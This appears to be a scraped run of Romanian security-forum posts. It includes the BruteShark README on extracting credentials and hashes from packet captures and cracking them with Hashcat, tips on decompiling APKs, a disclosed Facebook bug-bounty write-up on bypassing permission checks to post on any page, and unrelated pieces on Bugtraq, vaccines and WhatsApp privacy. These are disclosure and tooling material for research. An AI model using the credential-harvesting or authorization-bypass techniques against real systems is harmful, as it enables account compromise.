me a coffe What it can do Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...) Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) Build visual network diagram (Network nodes & users) Extract DNS queries Reconstruct all TCP & UDP Sessions File Carving Download Windows Prerequisites: WinPcap / Npcap driver (Wireshark installs one of this by default) .NET Core SDK Download Windows Installer (64 Bit). Linux Prerequisites: libpcap driver Download BruteSharkCli and just run it: # Create a symbolyc link between libpcap.so and the actual libpcap file (e.g. libpcap.so.0.8) # That needed due to a known issue in SharpPcap (https://github.com/chmorgan/sharppcap/issues/167) find /usr/lib/x86_64-linux-gnu -type f | grep libpcap | head -1 | xargs -i sudo ln -s {} /usr/lib/x86_64-linux-gnu/libpcap.so wget https://github.com/odedshimon/BruteShark/releases/latest/download/BruteSharkCli ./BruteSharkCli Examples Videos How do i crack (by mistake!) Windows 10 user NTLM password Run Brute Shark CLI on Ubuntu with Mono Hashes Extracting Building a Network Diagram File Carving Password Extracting Reconstruct all TCP Sessions Brute Shark CLI Usage In general, it is recommended to use the example PCAP files folder, load, run and explore the results. Modules BruteShark is a modular tool, designed for expansion. Credentials Module This module is responsible for extracting and encoding usernames and passwords as well as authentication hashes. In fact this module is responsible for updating two display tables, passwords table and hashes table. While usernames and passwords are straight forward to use, hashes most often used in more complex attacks like pass-the-hash or by brute-forcing them to get the password. BruteShark is integrated with Hashcat so all the hashes extracted can be converted to a Hashcat input file. Protocol Hash Type Hascat Mode (-m) HTTP HTTP-Digest 11400 SMTP\IMAP CRAM-MD5 16400 NTLM (e.g. SMB) NTLMv1 5500 NTLM (e.g. SMB) NTLMv2 5600 Kerberos AS-REQ etype 23 7500 Kerberos TGS-REP etype 23 13100 Kerberos AS-REP etype 23 18200 Network Map Module This module is responsible for building the network map by identifying components in the network and the connections between them. The network map can be exported to JSON format for analysis with external tools such as Neo4j. Files Extracting Module This module tries to extract files from UDP / TCP sessions (Therefore, note that in order for this module to be effective, the "Build TCP Sessions" / "Build UDP Sessions" should be turn on). Currently this module supports classic forensics techniques of file carving by "Header-Footer" algorithm which is effective for files with known file header and footer like JPG, PNG, PDF. BruteSharkDesktop The GUI is pretty self-explanatory, just load the wanted files, configure the wanted modules and press the run button. BruteSharkCli BruteSharkCli has two modes: single command and shell mode. The single command mode works by geting all the relevant parameters for the processing and then printing the results to stdout or files. The shell mode allows to perform each step individually. Single Command Mode Print the help menu: C:\Users\King\Desktop\BruteSharkCli>BruteSharkCli.exe --help BruteSharkCli 1.0.0.0 Copyright c 2018 -d, --input-dir The input directory containing the files to be processed. -i, --input The files to be processed seperated by comma -m, --modules The modules to be separterd by comma: Credentials, FileExtracting, NetworkMap -o, --output Output direcorty for the results files. --help Display this help screen. --version Display version information. Get credentials from all files in a directory (passwords and hashes will be printed to stdout): C:\Users\King\Desktop\BruteSharkCli>BruteSharkCli.exe -m Credentials -d "C:\Users\King\Desktop\Pcap Files" [+] Started analyzing 5 files File : Ftp.pcap Processing Started Found: Network Credential: 192.168.0.114=>192.168.0.193(FTP) => csanders:echo File : Ftp.pcap Processing Finished File : HTTP - Basic Authentication.pcap Processing Started Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:fail Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:fail2 Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:fail3 Found: Network Credential: 192.168.0.4=>192.254.189.169(HTTP Basic Authentication) => test:test File : HTTP - Basic Authentication.pcap Processing Finished File : IMAP - Authenticate CRAM-MD5.cap Processing Started Found: Hash: 10.0.2.101=>10.0.1.102:10.0.1.102(IMAP) CRAM-MD5 => aGVtbWluZ3dheSAyOWYyMGI2NjkzNDdhYTA4MTc0OTA2NWQ5MDNhNDllNA== File : IMAP - Authenticate CRAM-MD5.cap Processing Finished File : SMB - NTLMSSP (smb3 aes 128 ccm).pcap Processing Started Found: Hash: 10.160.64.139=>10.160.65.202:10.160.65.202(NTLMSSP) NTLMv2 => 39dbdbeb1bdd29b07a5d20c8f82f2cb701010000000000008a8ce7a9f4ced201e7969a04872c16890000000002000800530055005300450001000c0057005300320030003100360004000e0073007500730065002e006400650003001c005700530032003000310036002e0073007500730065002e006400650005000e0073007500730065002e0064006500070008008a8ce7a9f4ced20100000000 File : SMB - NTLMSSP (smb3 aes 128 ccm).pcap Processing Finished File : SMTP - Auth Login.pcap Processing Started Found: Network Credential: 10.10.1.4=>74.53.140.153(SMTP (Auth Login)) => gurpartap@patriots.in:punjab@123 File : SMTP - Auth Login.pcap Processing Finished [X] Bruteshark finished processing Get credentials from all files in a directory and also export extracted hashes (if found) to a Hashcat input files. BruteSharkCli.exe -m Credentials -d C:\Users\King\Desktop\Pcap_Examples -o C:\Users\King\Desktop\Results Run multiple modules on all files in a directory and also export all the results. BruteSharkCli.exe -m Credentials,NetworkMap,FileExtracting -d C:\Users\King\Desktop\Pcap_Examples -o C:\Users\King\Desktop\Results Shell Mode Just type BruteSharkCli.exe And then navigate using the following commands. Keyword Description help Print help menu exit Exit CLI add-file Add file to analyze. Usage: add-file FILE-PATH start Start analyzing show-passwords Print passwords. show-modules Print modules. show-hashes Print Hashes show-networkmap Prints the network map as a json string. Usage: show-networkmap export-hashes Export all Hashes to Hascat format input files. Usage: export-hashes OUTPUT-DIRECTORY export-networkmap Export network map to a json file for neo4j. Usage: export-networkmap OUTPUT-FILE Architecture All BruteShark projects are implemented using .Net Core and .Net Standard for modern and cross platform support. The solution is designed with three layer architecture, including a one or more projects at each layer - DAL, BLL and PL. The separation between layers is created by the fact that each project refers only its own objects. PcapProcessor (DAL) As the Data Access Layer, this project is responsible for reading raw PCAP files using appropriate drivers (WinPcap, libpcap) and the amazing wrapper library SharpPcap by Chris Morgan. Can analyze a list of files at once, and provides additional features like reconstruction of all TCP Sessions (using the awesome project TcpRecon). PcapAnalyzer (BLL) The Business Logic Layer, responsible for analyzing network information (packet, TCP Session etc.), implements a pluggable mechanism. Each plugin is basically a class that implements the interface IModule. All plugins are loaded using reflection: private void _initilyzeModulesList() { // Create an instance for any available modules by looking for every class that // implements IModule. this._modules = AppDomain.CurrentDomain.GetAssemblies() .SelectMany(s => s.GetTypes()) .Where(p => typeof(IModule).IsAssignableFrom(p) && !p.IsInterface) .Select(t => (IModule)Activator.CreateInstance(t)) .ToList(); // Register to each module event. foreach(var m in _modules) { m.ParsedItemDetected += (s, e) => this.ParsedItemDetected(s, e); } } BruteSharkDesktop (PL) Desktop application for Windows based on WinForms. Uses a cross-cutting project by the meaning it referrers both the DAL and BLL layers. This is done by composing each of the layers, register to their events, when event is triggered, cast the event object to the next layer equivalent object, and send it to next layer. public MainForm() { InitializeComponent(); _files = new HashSet<string>(); // Create the DAL and BLL objects. _processor = new PcapProcessor.Processor(); _analyzer = new PcapAnalyzer.Analyzer(); _processor.BuildTcpSessions = true; // Create the user controls. _networkMapUserControl = new NetworkMapUserControl(); _networkMapUserControl.Dock = DockStyle.Fill; _sessionsExplorerUserControl = new SessionsExplorerUserControl(); _sessionsExplorerUserControl.Dock = DockStyle.Fill; _hashesUserControl = new HashesUserControl(); _hashesUserControl.Dock = DockStyle.Fill; _passwordsUserControl = new GenericTableUserControl(); _passwordsUserControl.Dock = DockStyle.Fill; // Contract the events. _processor.TcpPacketArived += (s, e) => _analyzer.Analyze(Casting.CastProcessorTcpPacketToAnalyzerTcpPacket(e.Packet)); _processor.TcpSessionArived += (s, e) => _analyzer.Analyze(Casting.CastProcessorTcpSessionToAnalyzerTcpSession(e.TcpSession)); _processor.FileProcessingStarted += (s, e) => SwitchToMainThreadContext(() => OnFileProcessStart(s, e)); _processor.FileProcessingEnded += (s, e) => SwitchToMainThreadContext(() => OnFileProcessEnd(s, e)); _processor.ProcessingPrecentsChanged += (s, e) => SwitchToMainThreadContext(() => OnProcessingPrecentsChanged(s, e)); _analyzer.ParsedItemDetected += (s, e) => SwitchToMainThreadContext(() => OnParsedItemDetected(s, e)); _processor.TcpSessionArived += (s, e) => SwitchToMainThreadContext(() => OnSessionArived(Casting.CastProcessorTcpSessionToBruteSharkDesktopTcpSession(e.TcpSession))); _processor.ProcessingFinished += (s, e) => SwitchToMainThreadContext(() => OnProcessingFinished(s, e)); InitilizeFilesIconsList(); this.modulesTreeView.ExpandAll(); } Contributing First off, thanks for taking the time to contribute! BruteShark welcomes contributions from everyone. When contributing to this repository, please first discuss the change you wish to make via issue or an email before making a change. How Can You Contribute? Implemening new features from BruteShark Issues, look for "good first isuue" and "help wanted" labels. Uploading example PCAP files, especially files, with interesting content. Proposing new features by Creating an Issue. Reporting a bug by Creating an Issue. Discussing the current state of the code. Creating videos and example tutorials of using BruteShark. Sursa: https://github.com/odedshimon/BruteShark

Nu stiu daca e vreo solutie "usoara" la asa ceva. Probabil dezvoltatorii au contract de reclame cu cine stie ce firma si poate nici nu stiu ca asta se poate intampla, probabil afiseaza reclame aleator. Sau poate stiu ca si asta se poate intampla, dar de acolo iese banul. Ca sa faci ceva efectiv ai nevoie de un telefon cu jailbreak, teoretic poti modifica aplicatia, dar apoi nu stiu daca o mai poti rula pe un telefon fara jailbreak. Nu recomand acest jailbreak pentru folosire de zi cu zi, de catre persoane care nu stiu exact despre ce e vorba. Fa o analiza pe cea pentru Android, e mai simplu si nu ai nevoie nici macar de telefon. Ia link-ul aplicatiei si foloseste una dintre acele aplicatii online pentru "APK downloader". Iei APK si il extragi cu WinRAR/WinZip sau altceva. O sa ai un classes.dex (poate si classes2.dex) si folosesti "dex2jar" pentru a extrage JAR-ul. Iar JAR-ul il poti baga in "jd-gui" si vezi codul sursa. E destul de simplu pe Linux, le poti descarca direct, nu stiu daca sunt implicit in Kali, nu cred.

Salut, invata bine limbajul in sine, asta te va ajuta sa inveti apoi orice alt limbaj zic eu. Sugestia mea e sa citesti o carte si sa scrii cod. Nu stiu daca C++ e prea util sau foarte folosit la astfel de companii, la unele este! Apoi, invata si algoritmica. La companii gen Google si altele se pune accentul pe algoritmi si optimizari de cod. Vezi ca sunt si multe articole/tutoriale de genul "interviu la Google", o sa iti faci o idee despre asta.

The easiest solution would be to uninstall it and install it again, latest version. Restart(s) might be needed but it should work.

Bugtraq has been a valuable institution within the Cyber Security community for almost 30 years. Many of our own people entered the industry by subscribing to it and learning from it. So, based on the feedback we’ve received both from the community-at-large and internally, we’ve decided to keep the Bugtraq list running. We’ll be working in the coming weeks to ensure that it can remain a valuable asset to the community for years to come. - Accenture Security

Poliomielita a fost eradicata prin vaccinare in masa. Nu s-a intamplat la fel si pentru gripa. Nu cred ca se va intampla vreodata, simptomele nu sunt atat de vizibile ca la alti virusi (e.g. varicela, rujeola...) si nici rata de deces nu este atat de mare (cel putin la tineri). De aceea oamenii nu se streseaza si nu se vaccineaza (la noi in tara).

Nu cred ca se stie, insa cred ca tendinta e sa fie ceva mai nasol, probabil depinde de intervalul de reinfectare. Mai exact, sa presupunem ca prima infectie afecteaza 5% din plamani. Si e posibil ca aceasta problema sa nu se rezolve pana la urmatoarea infectare iar daca urmatoarea infectare afecteaza tot 5% vei avea un combo de 10%. Teoretic ma gandesc. Durata imunitatii depinde de fiecare, atat de sistemul imunitar si starea sa in fiecare infectie, cat si de "intensitatea" infectiei, ma refer la cat de mult virus intra in organism la infectare.

Salut, nu cred ca ai nevoie de vreun programel crackuit, fa un Live CD cu Kali Linux si ai acolo tot ce ai nevoie. Tutoriale sunt o gramada, chiar si in aceasta categorie de forum, sunt o gramada de tool-uri free iar unele au si interfata grafica.

Am deschis si eu acel link, cred ca si pe mine vor sa ma cunoasca fetele respective, sper sa nu fii gelos. Vestea buna e ca nu au penis. Vestea rea ca e un spam de 2 lei. Ignori si mergi mai departe.

2020 was quite the year, one that saw many changes. As we begin 2021, we wanted to send one last note to our friends and supporters at the SecurityFocus BugTraq mailing list. As many of you know, assets of Symantec were acquired by Broadcom in late 2019, and some of those assets were then acquired by Accenture in 2020 (https://newsroom.accenture.com/news/accenture-completes-acquisition-of-broadco ms-symantec-cyber-security- services-business.htm). SecurityFocus assets were included in this transition, and the mailing list has not been updated since the work to transition to Accenture began. The SecurityFocus assets, including the BugTraq mailing list, has a long history of providing timely information on the latest vulnerabilities, security vendor announcements, and exploit information. We are forever grateful to those who created, maintained, and contributed to the archive - many of us have connected and learned from each other through these lists. The history of the list and the sharing of the information has contributed to ensuring that we are building the information security community to be something stronger. Community contribution is one of the foundations to building a stronger Information Security force. At this time, resources for the BugTraq mailing list have not been prioritized, and this will be the last message to the list. The archive will be shut down January 31st, 2021. For similar information, please refer to some of the following links: https://www.defcon.org/html/links/mailing-lists.html https://seclists.org/fulldisclosure/ This is where the appropriate geek-like reference and farewell comes in, something like “So long, and thanks for all the fish”, but that seems too cavalier for this. So thank you, for your support, wisdom, and willingness to share – whether you are a contributor, reader, or lurker on the list. All of you have made a difference. Be well, and keep up the good work!

Te referi la antivirale? Vezi asta: https://medicamente.romedic.ro/info/medicamentele-antivirale Gandeste-te la Windows, de ce sa fii infectat cu ransomware si sa incerci sa scapi de el cu cine stie ce "cleaner" (care nu poate face mare lucru) cand poti avea un antivirus actualizat la zi care sa il previna? @gigiRoman - Nu stiu de unde ai informatiile acelea, nu a zis nimeni ca anticorpii dobanditi prin infectie dureaza 3 luni. Ideea cu vaccinul si acele 2 doze o reprezinta tocmai acest lucru: stimuleaza dobandirea anticorpilor in cel mai bun mod posibil, testat de catre ei. De aceea prima doza e mai mica si a doua mai mare, tocmai pentru ca anticorpii sa dureze mai mult, sa isi faca treaba celulele de memorie T (parca). Edit: Klaus s-a vaccinat: https://www.digi24.ro/stiri/actualitate/klaus-iohannis-se-vaccineaza-anti-covid-la-ora-10-00-1434453 , deci problema e pe jumatate rezolvata. O sa o fac si eu cand imi vine randul. Apropo, mi-a dat mesaj privat Klaus, cica chip-ul ii cere licenta, zicea sa-i dau cont de filelist sa isi descarce una, sau un crack, are cineva cont filelist de dat?

Util: https://www.nytimes.com/interactive/2020/health/oxford-astrazeneca-covid-19-vaccine.html Au uitat sa explice cum functioneaza chip-ul, dar in rest, pare frumos explicat.

Gresit. Asa au inventat "hentai"-ul.

Daca o sa pot, cand ma vaccinez, pun pe cineva sa ma filmeze. Dar stati linistit ca nu sunt fraier, ma duc cu folia de aluminiu si mi-o pun pe cap apoi, nu il las eu pe Bill sa ma controleze! Cat despre prima stire, normal ca se poate ca dupa prima doza sa te infectezi. Se poate si dupa a doua, dar sunt sanse foarte mici, adica acei 5%. Mama a inteles asta, probabil are un IQ mai mare ca tine si nu prea se "documenteaza" pe subiect. PS: Da, normal ca se monitorizeaza, se vrea sa se afle durata de timp a anticorpilor. Oricum difera de la persoana la persoana, dar sa se stie aproximativ cat de mult ajuta. Intre timp ai mai sus toata documentatia necesara referitoare la vaccin. Acolo sunt datele oficiale, tot ce ai nevoie sa stii despre el. Citeste-le si spune-ne si noua daca e ceva in neregula acolo.

Nu stiu daca informatiile se voiau publice, cel putin nu de la Agentia Europeana a Medicamentului. Acele fisiere par sa contina foarte multe detalii referitoare la vaccin, poate chiar totul, ceea ce inseamna ca si altii ar putea sa il reproduca. Codul sursa Pentru noi, oamenii de rand e bine. Putem sa il intelegem, in totalitate daca am si avea cunostiintele necesare. Si poate medicii cu experienta, microbiologii sau alte persoane pot sa deduca anumite lucruri de acolo, cum ar fi efectele la persoanele cu alergii.

Da, interesant, dar nu stiu cat ajuta. Probabil altii au facut asta cu mult timp inainte, fara intentii pozitive si fara sa anunte IP-ul folosit. Dar mi se pare ca evolueaza lucrurile si la noi. Testul oricum nu e intrusiv, nici nu ar trebui sa anunte, dar probabil sa nu panicheze pe cineva. De parca ar monitoriza cineva loguri si accesul pe acel fisier... Ca dovada, am dat un grep pe mizeria mea de site - www.xssfuzzer.com root@xssfuzzer:/var/log/apache2# grep -R Orion . ./access.log.1:162.243.128.120 - - [14/Dec/2020:04:29:57 +0000] "GET /Orion/Login.aspx HTTP/1.1" 404 3537 "-" "Mozilla/5.0 zgrab/0.x" ./access.log.1:145.220.25.28 - - [28/Dec/2020:02:44:00 +0000] "GET /Orion/WebResource.axd HTTP/1.1" 404 3537 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" Dragut.

Super, mersi mult! M-am uitat putin, vad niste mail-uri neinteresante si niste rapoarte, nu pare sa fie ceva confidential pe acolo. Am vazut intr-un docx structura si cateva detalii despre vaccin! Bine, nu inteleg mare lucru, dar e acolo. Daca va intreaba cineva ce contine acel vaccin le puteti da cu documentul ala in cap.

Am vazut si eu stirile acestea, dar nu am inteles ce ar contine acele documente. Are cineva acel leak?

E fake, stiu, dar daca nu tineti cont de asta e chiar emotionant... https://9gag.com/gag/aeDrrqQ

Daca are cere cont premium, fara reclame, pe WhatsApp, ar deveni reale (partial) acele mesaje idioate ca "WhatsApp nu o sa mai fie gratuit".

Relevant

Why everyone should be using Signal instead of WhatsApp The Signal protocol underpins WhatsApp's encryption, but Facebook's ubiquitous messaging service doesn't hold a candle to Signal itself By K.G ORPHANIDES Thursday 16 April 2020 WIRED WhatsApp is the most popular communications app on the planet with over two billion users using it for messaging. Bought by Facebook in 2014, the service popularised the use of end-to-end encryption in day-to-day communications, introducing it as its default for messaging in 2016. To do so it cooperated with Moxy Marlinspike’s Open Whisper Systems to integrate the Signal encrypted messaging protocol. Microsoft and Google have also used the protocol, widely regarded as the gold standard in encrypted communications. Now Open Whisper Systems exists as Signal Messenger, LLC, and is part of the Signal Foundation. This rebranding has seen the foundation put more effort into its own app. The Signal Foundation's flagship Signal app provides fully-fledged and easy to use secure communications in its own right. It has direct and group messaging, as well as one-to-one audio and video chat, and there are very good reasons to opt for secure messaging's Cool Original flavour over WhatsApp. In February, the European Commission advised its staff to do exactly that. Here’s why you should use Signal for any conversation where privacy matters – even if that’s just giving your family the shared Disney+ password – and why your friends should, too. 1. Signal has more up-to-date security features New security features come to Signal first. For example, Signal has had disappearing messages – which are automatically deleted after a specified period of time – since 2016 but the feature is still being tested with small numbers of WhatsApp users. Other mainstream and beta Signal features that WhatsApp users don’t have include view-oncemedia messages, encrypted profiles, an incognito keyboard switch for Android to keep Gboard from sending your typing history back to Google, and backups that don’t default to unencrypted storage in Google Drive or Apple iCloud. Signal also has a slightly broader range of clients, with a dedicated client for Linux desktop users – likely to appeal to those in the security and data analysis fields, while WhatsApp directs them to its web app. 2. Signal is open source All of Signal’s source code is published for anyone to examine and use under a GPLv3 license for clients and an AGPLv3 license for the server. This means that you can see what’s going on inside it – or, more usefully, rely on the specialist expertise of people who review the code and know exactly what they’re looking for. 3. Signal has less potential for hidden vulnerabilities As a larger platform, WhatsApp is more inviting to malicious actors to start with, but the fact that its codebase is a proprietary closed box means that it may take longer for dangerous vulnerabilities to be detected. Any application can and eventually will suffer vulnerabilities – Signal has resolved a few of its own. But WhatsApp’s closed-source code (beyond its use of the open Signal protocol) means that there are a lot of potential targets that remain unknown until they’re exploited. A particularly worrying example was a vulnerability in WhatsApp’s VoIP stack, used by intelligence agencies to inject spyware in 2019. 4. You can run your own Signal server (but probably shouldn’t) Another advantage of open source software is that you can play with it, if you’re that way inclined. You probably won’t want or need a Signal server of your own for either personal or business reasons. It’s designed as a mass communications platform and isn’t really intended to scale down, it’s a pain to build and there are currently no containerised versions for easy deployment. But if you’re technically minded, you can learn a lot about how a system functions by building a test instance and poking it with a stick. It’s non-trivial, but community guides are available to help users get a Signal server up and running and some interesting forks exist, including a decentralised messaging system. 5. How much can you trust Facebook? Perhaps the most compelling reason to use Signal is Facebook's long-standing lack of respect for its users' privacy. Facebook has an appalling history when it comes to data collection and handling, from the Cambridge Analytica affair to its practice of sharing data about users with phone manufacturers. It’s already proved that it can’t be trusted with WhatsApp user data that should, under EU law, have remained private. In 2017, European regulators took action against Facebook for sharing the WhatsApp users’ phone numbers with its Facebook social network for advertising purposes. Firmly in breach of data protection regulations, it was an opt-out rather than opt-in system. Facebook had previously claimed such a mechanism would never be implemented. WhatsApp co-developer Brian Acton, who left Facebook in 2017 and went on to co-found the Signal Foundation with Marlinspike, has harshly criticised Facebook’s approach to privacy and revealed that Facebook coached him “to explain that it would be really difficult to merge or blend data between [WhatsApp and Facebook]” when giving information to EU regulators in 2014. Facebook’s desire to insert adverts and commercial messaging into WhatsApp and potentially compromise its security prompted Acton to leave Facebook early, sacrificing some $850 million in stock in the process. Acton’s fellow WhatsApp dev, Jan Koum, also walked out on Facebook following reported disputes with the company over its efforts to weaken encryption. Mark Zuckerberg has since publicly supported end-to-end encryption, saying it will also be added to its Messenger app. Facebook was until recently still vacillating over plans to introduce adverts to WhatsApp, with the latest reports indicating that the plan has finally been scrapped. Although it's not clear what will eventually happen to the service when Facebook merges WhatsApp with Instagram messaging and Messenger. Sursa: https://www.wired.co.uk/article/signal-vs-whatsapp

Create post on any Facebook page Pouya 12:17 PM No comments Create an invisible post on any Facebook page You may know that you can create many types of posts on your Facebook feed. one of them is called "invisible" which unlike other types cannot be seen on your feed, but like others, it has a link and id. These types of posts are not shown on the feed timeline but are accessible via a direct link. the main impact of these types of posts is that the page admins cannot view or delete them since they don't have any links. At Creative Hub we can create ads and use collaboration to complete them. Facebook creates an invisible post on the selected page for previewing them to the users. I intercepted the request and change the "page_id" to the victim's "page_id" and it saves without any error or issue. The permission here has been checked before generating the preview so you should definitely have the advertiser role. (above image) Also, the Share Feature (image below) has been added to Facebook's Creative Hub recently, therefore, I started digging deeper into it again. After clicking on the share button the API will answer with a new shareable URL like this: https://www.facebook.com/ads/previewer/__PREVIEW_KEY__ The gotcha is that the permission-check is missing before generating a preview post on the share page. Changing page_id before saving the mockup in Graphql request and then getting back the sharable link for it, gives us the ability to create a post on any page. All we need to do is to find the post_id that exists on any ad preview endpoints. Finally, we created an invisible post on the victim page without their knowledge! POC: Facebook fixed this vulnerability after I reported it but still, I was able to bypass the fix by using another approach. // This request will create a post page plus sending a notification to the mobile device AsyncRequest.post('/ads/previewer/notify_mobile/__PREVIEW_KEY__',{}) The "send to mobile" feature creates a preview again without checking permission. Bypass POC: Timeline: November 6, 2020 – Report Sent November 6, 2020 – Triaged November 11, 2020 – Fixed November 12, 2020 – Bypass Sent November 12, 2020 – Triaged November 20, 2020 – Fixed December 16, 2020 – $30,000 Bounty awarded Sursa: https://www.darabi.me/2020/12/create-invisible-post-on-any-facebook.html

WhatsApp Will Disable Your Account If You Don't Agree Sharing Data With Facebook January 06, 2021 Ravie Lakshmanan "Respect for your privacy is coded into our DNA," opens WhatsApp's privacy policy. "Since we started WhatsApp, we've aspired to build our Services with a set of strong privacy principles in mind." But come February 8, 2021, this opening statement will no longer find a place in the policy. The Facebook-owned messaging service is alerting users in India of an update to its terms of service and privacy policy that's expected to go into effect next month. The "key updates" concern how it processes user data, "how businesses can use Facebook hosted services to store and manage their WhatsApp chats," and "how we partner with Facebook to offer integrations across the Facebook Company Products." The mandatory changes allow WhatsApp to share more user data with other Facebook companies, including account registration information, phone numbers, transaction data, service-related information, interactions on the platform, mobile device information, IP address, and other data collected based on users' consent. Unsurprisingly, this data sharing policy with Facebook and its other services doesn't apply to EU states that are part of the European Economic Area (EEA), which are governed by the GDPR data protection regulations. The updates to WhatsApp terms and privacy policy come on the heels of Facebook's "privacy-focused vision" to integrate WhatsApp, Instagram, and Messenger together and provide a more coherent experience to users across its services. Users failing to agree to the revised terms by the cut-off date will have their accounts rendered inaccessible, the company said in the notification. This effectively means that, while the profiles will remain inactive, WhatsApp will eventually end up deleting the accounts after 120 days of inactivity (i.e. not connected to the app) as part of its efforts to "maintain security, limit data retention, and protect the privacy of our users." WhatsApp's Terms of Service was last updated on January 28, 2020, while its current Privacy Policy was enforced on July 20, 2020. Facebook Company Products refers to the social media giant's family of services, including its flagship Facebook app, Messenger, Instagram, Boomerang, Threads, Portal-branded devices, Oculus VR headsets (when using a Facebook account), Facebook Shops, Spark AR Studio, Audience Network, and NPE Team apps. It, however, doesn't include Workplace, Free Basics, Messenger Kids, and Oculus Products that are tied to Oculus accounts. What's Changed in its Privacy Policy? In its updated policy, the company expands on the "Information You Provide" section with specifics about payment account and transaction information collected during purchases made via the app and has replaced the "Affiliated Companies" section with a new "How We Work With Other Facebook Companies" that goes into detail about how it uses and shares the information gathered from WhatsApp with other Facebook products or third-parties. This encompasses promoting safety, security, and integrity, providing Portal and Facebook Pay integrations, and last but not least, "improving their services and your experiences using them, such as making suggestions for you (for example, of friends or group connections, or of interesting content), personalizing features and content, helping you complete purchases and transactions, and showing relevant offers and ads across the Facebook Company Products." One section that's received a major rewrite is "Automatically Collected Information," which covers "Usage and log Information," "Device And Connection Information," and "Location Information." "We collect information about your activity on our Services, like service-related, diagnostic, and performance information. This includes information about your activity (including how you use our Services, your Services settings, how you interact with others using our Services (including when you interact with a business), and the time, frequency, and duration of your activities and interactions), log files, and diagnostic, crash, website, and performance logs and reports. This also includes information about when you registered to use our Services; the features you use like our messaging, calling, Status, groups (including group name, group picture, group description), payments or business features; profile photo, "about" information; whether you are online, when you last used our Services (your "last seen"); and when you last updated your "about" information." WhatsApp's revised policy also spells out the kind of information it gathers from users' devices: hardware model, operating system information, battery level, signal strength, app version, browser information, mobile network, connection information (including phone number, mobile operator or ISP), language and time zone, IP address, device operations information, and identifiers (including identifiers unique to Facebook Company Products associated with the same device or account). "Even if you do not use our location-related features, we use IP addresses and other information like phone number area codes to estimate your general location (e.g., city and country)," WhatsApp updated policy reads. Concerns About Metadata Collection While WhatsApp is end-to-end encrypted, its privacy policy offers an insight into the scale and wealth of metadata that's amassed in the name of improving and supporting the service. Even worse, all of this data is linked to a user's identity. Apple's response to this unchecked metadata collection is privacy labels, now live for first- and third-party apps distributed via the App Store, that aim to help users better understand an app's privacy practices and "learn about some of the data types an app may collect, and whether that data is linked to them or used to track them." The rollout forced WhatsApp to issue a statement last month. "We must collect some information to provide a reliable global communications service," it said, adding "we minimize the categories of data that we collect" and "we take measures to restrict access to that information." In stark contrast, Signal collects no metadata, whereas Apple's iMessage makes use of only email address (or phone number), search history, and a device ID to attribute a user uniquely. There's no denying that privacy policies and terms of service agreements are often long, boring, and mired in obtuse legalese as if deliberately designed with an intention to confuse users. But updates like this are the reason it's essential to read them instead of blindly consenting without really knowing what you are signing up for. After all, it is your data. UPDATE: Why Zuckerberg Wants to Integrate WhatsApp and Facebook? In a statement shared with The Hacker News, a WhatsApp spokesperson justifies integrating both platforms by saying: "As we announced in October, WhatsApp wants to make it easier for people to both make a purchase and get help from a business directly on WhatsApp. While most people use WhatsApp to chat with friends and family, increasingly people are reaching out to businesses as well. To further increase transparency, we updated the privacy policy to describe that going forward businesses can choose to receive secure hosting services from our parent company Facebook to help manage their communications with their customers on WhatsApp." "Though of course, it remains up to the user whether or not they want to message with a business on WhatsApp. The update does not change WhatsApp's data sharing practices with Facebook and does not impact how people communicate privately with friends or family wherever they are in the world. WhatsApp remains deeply committed to protecting people's privacy. We are communicating directly with users through WhatsApp about these changes so they have time to review the new policy over the course of the next month." Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Sursa; https://thehackernews.com/2021/01/whatsapp-will-delete-your-account-if.html